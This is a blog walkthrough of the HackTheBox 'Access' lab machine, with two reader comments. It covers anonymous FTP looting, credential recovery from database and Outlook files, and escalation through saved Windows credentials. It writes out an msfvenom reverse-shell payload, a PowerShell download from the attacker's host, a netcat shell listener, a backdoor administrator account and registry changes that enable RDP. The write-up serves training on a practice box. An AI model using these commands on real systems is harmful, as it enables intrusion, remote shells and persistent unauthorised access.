Access – HacktheBox

Skills Required
Basic knowledge of Linux
GoogleFu

Skills Learned
Telnet
Taking advantage of saved credentials

START

nmap -sC -sV -oA all -vv -p- 10.10.10.98

ports after full nmap scan
only thing on the index page

I did a dirbuster search and nikto but they both revealed nothing of use. I always check these first as they take time to run. So I can get them running and move on. Now to do a nmap FTP scan.

[root:~/htb/access/writeup]# nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.10.10.98
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 14:47 GMT
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Nmap scan report for 10.10.10.98
Host is up, received echo-reply ttl 127 (0.036s latency).

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 127
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.

Nmap done: 1 IP address (1 host up) scanned in 22.19 seconds
[root:~/htb/access/writeup]# 

So anonymous FTP login is available! Directory listing is not possible this way for some reason. Lets check for files using FileZilla!

Pulled backup.mdb and Access Control.zip back to kali

2 folders and 2 files found. Inside Engineer file – a zip file called Access Control.zip and inside backup folder – backup.mdb.

I tried to open Access Control.zip but it was password protected.

I’m gonna assume the password is within the other file somewhere. If stuck not knowing what a file type is I always refer to Google!

what is .mdb file. 

I searched to see if there was an easy way to view the contents of the file and found a useful site – https://www.mdbopener.com/

I found a table called “auth user” – seems interesting. Opened it and there are 3 entries

Using the engineer password I extracted the contents of Access Control.zip to give me a .pst file. Back to Google!

Looks like a file Outlook would use

So it looks like a saved email. I don’t want to have to use Outlook to view it so I check Google once again for an easier way. https://www.pdfen.com/convert-to-pdf/pst-to-pdf

So there is a user account on this box called ‘security’ with a password ‘4Cc3ssC0ntr0ller’. Okay so how do I login? Lets try FTP. Back to Filezilla!

Command:    USER engineer
Response: 331 Password required for engineer.
Command: PASS **
Response: 530 User cannot log in.

Okay that didn’t work so I tried telnet

Adding creds to Pentest.ws

What type and build of server am I connected to?

C:\temp\scripts>systeminfo                                                                                                                                           [102/1437]
Host Name: ACCESS
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84191
Original Install Date: 8/21/2018, 9:43:10 PM
System Boot Time: 11/22/2018, 2:47:46 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC

Captured user.txt file

C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38
C:\Users\security\Desktop>

So I browsed around uploaded nc.exe but could not executed it. It looks like scripts and executables are blocked.

This program is blocked by group policy. For more information, contact your system administrator.

I started to look for files/folders which are not in the standard Windows install – and found this:

C:\ZKTeco>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of C:\ZKTeco
08/22/2018 07:23 AM
.
08/22/2018 07:23 AM ..
08/23/2018 10:56 PM ZKAccess3.5
0 File(s) 0 bytes
3 Dir(s) 16,771,903,488 bytes free
C:\ZKTeco>
[root:~/htb/access]# searchsploit ZKAccess

Exploit Title
ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation

To save you reading about me struggling with this part  – it turned out to be a rabbit hole. I knew it was the wrong version but sometimes the vulnerability might be in the older version as well, so it was worth a shot

I poked about and found a scripts folder with vbs scripts… interesting – especially the readme_first.txt.

C:\temp\scripts>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of C:\temp\scripts
08/21/2018 10:25 PM
.
08/21/2018 10:25 PM ..
08/21/2018 10:30 PM 157 1_CREATE_SYSDBA.sql
08/21/2018 10:30 PM 90 2_ALTER_SERVER_ROLE.sql
08/21/2018 10:30 PM 300 3_SP_ATTACH_DB.sql
08/21/2018 10:30 PM 100 4_ALTER_AUTHORIZATION.sql
08/21/2018 10:30 PM 1,802 README_FIRST.txt
03/12/2018 01:37 PM 5,013 RestartServiceByDescriptionNameLike.vbs
03/12/2018 01:37 PM 1,998 SetAccessRuleOnDirectory.vbs
03/12/2018 01:37 PM 26,624 sqlcommand.exe
03/12/2018 01:37 PM 3,855 SQLOpenFirewallPorts.vbs
03/12/2018 01:37 PM 5,277 SQLServerCfgPort.vbs
10 File(s) 45,216 bytes
2 Dir(s) 16,771,903,488 bytes free
README_FIRST.txt
"Login:" = "sa"
"Password:" = "htrcy@HXeryNJCTRHcnb45CJRY"

Looks like SQL db user & password

I checked to see if any saved creds. A lazy admin would save credentials using cmdkey. It creates, lists, and deletes stored user names and passwords or credentials.

always noting the creds I capture

So this admin seems to be quite lazy – including the password inside this file. I check to see if he has saved any credentials to the machine and bingo!

C:\temp\scripts>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator Type: Domain PasswordUser: ACCESS\Administrator
C:\temp\scripts>

So the Administrator password is stored!

I wanted to upgrade to a proper shell as using Telnet is very difficult to use due to not being able to delete letters or press up on the keyboard to replay things in the buffer.

So know thing that .exes cant be run and that there are .vbs files in the scripts folder  – maybe the user can run .vbs files?

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.234 LPORT=443 --platform windows -a x64 -f vbs -o shell.vbs

I created a .vbs file, downloaded it to the server and tried to run it but no luck – looks like .vbs files can only be run by the administrator.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.234/shell.vbs','C:\temp\scripts\shell.vbs')"
C:\temp\scripts>shell.vbs
Access is denied.
C:\temp\scripts>
For the vbs scripts: 
Go to windows Services and stop ALL SQL related services.
Open command prompt with elevated privileges (Administrator).
paste the following commands in command prompt for each script and click ENTER…
1. cmd.exe /c WScript.exe "c:\temp\scripts\SQLOpenFirewallPorts.vbs" "C:\Windows\system32" "c:\temp\logs\"

I need to use the runas command as it has a flag /savecreds which takes advantage of the administrator saved creds on the system.

So following the guide in the README_FIRST.txt I created this runas command with a nc listener on port 443.

runas /user:Administrator /noprofile /savecred "cmd.exe /c WScript.exe "c:\temp\scripts\shell.vbs""
[root:~/htb]# nc -lnvp 443
listening on [any] 443 …
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.98] 49158
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
Access is denied.
C:\Windows\system32>whoami
whoami
access\administrator
C:\Windows\system32>

So I got connected but strangely I could not read the root.txt file even though I’m logged in as administrator. I always find it easier to work with remote desktop. I know its very noisy but for this final bit its worth it.

I created a new user called test with password TotallySec123

C:\Users\Administrator\Desktop>net user test TotallySec123 /add
net user test TotallySec123 /add
The command completed successfully.
C:\Users\Administrator\Desktop>net localgroup administrators test /add
net localgroup administrators test /add
The command completed successfully.

To enable remote desktop I ran the following as Administrator:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
logged on as test with password TotallySec123
root.txt file is green
the file is encrypted 

It looks like the contexts can be indexed.

I uploaded a meterpreter shell to priv esc to nt authority\system to see if could view the contents of the file but unfortunately I couldn’t.

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
C:\Users\Administrator\Desktop>

I tried to use powershell to view the contents.

C:\Users\Administrator\Desktop>powershell -nologo "& "Get-Content root.txt"
Get-Content : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.

I’m really not sure whats going on here. Hopefully some one can enlighten me. I managed to get root by changing the administrator password, enabling Remote Desktop logging in, running the ZkAccess program, exiting Remote Desktop then viewing the text file as below:

C:\Users\Administrator\Desktop>type root.txt
type root.txt
6e1586cc7ab230a8d297e8f933d904cf
C:\Users\Administrator\Desktop>


rowbot

Share

2 Responses

  1. Hey man, just a quick question is there any chance you can use multi/handler to handle the shell in this box?

  2. hi shin,

    Yes you can use the multi-handler, I just used netcat as its quicker to load up. I would generally use the multi handler when I want a meterpreter reverse shell.

Leave a Reply to shin Cancel reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.